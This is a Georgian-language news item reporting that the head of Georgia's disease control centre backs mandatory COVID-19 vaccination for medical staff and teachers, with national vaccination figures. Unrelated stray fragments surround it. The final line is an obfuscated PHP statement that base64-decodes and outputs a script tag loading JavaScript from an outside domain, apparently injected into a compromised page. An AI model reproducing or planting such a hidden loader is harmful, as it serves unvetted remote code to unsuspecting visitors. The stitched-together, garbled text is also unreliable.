celsiusi
ავერსი შნაიდერი
ჩვენ სამედიცინო პერსონალისა და მასწავლებლებისათვის აცრების სავალდებულოობას ვემხრობით, - ამის შესახებ დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელმა ამირან გამყრელიძემ "საზოგადოებრივი მაუწყებლის" ეთერში განაცხადა.
 
მისივე თქმით, ამ საკითხზე ამ დრომდე აზრები იყოფა და ერთობლივი პოზიცია არ არის.
 
როგორც გამყრელიძემ აღნიშნა, ექიმებში ვაქცინაციის მაჩვენებელი დაახლოებით 77%-ია. ბოლო პერიოდში გაიზარდა პედაგოგებშიც აცრების რაოდენობამ. თუმცა, ვაქცინაციის ზოგადი ტემპი იკლებს.
 
ცნობისთვის, საქართველოში COVID-19-ის წინააღმდეგ ვაქცინაციის პროცესი 15 მარტიდან დაიწყო. მას შემდეგ ვაქცინის მინიმუმ ერთი დოზით აიცრა 947,477 ადამიანი, ხოლო 707,563 ადამიანი კი ორჯერადად არის აცრილი. დღემდე ქვეყანაში 1,655,040 დოზა ვაქცინა არის ჩატარებული.
 
საქსტატის მონაცემებით, საქართველოს მთლიანი მოსახლეობა 3,728,600-ია, მათ შორის ზრდასრულების რაოდენობაა 2,861,000 ადამიანი, საიდანაც 60%-ის აცრა 1,716,600 მოქალაქის ვაქცინაციას ნიშნავს. 20 სექტემბრის ჩათვლით ზრდასრული მოსახლეობის 33.1% არის ერთხელ მაინც აცრილი, ხოლო ორჯერადად აცრილია ზრდასრული მოსახლეობის 24.7%.
1137
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");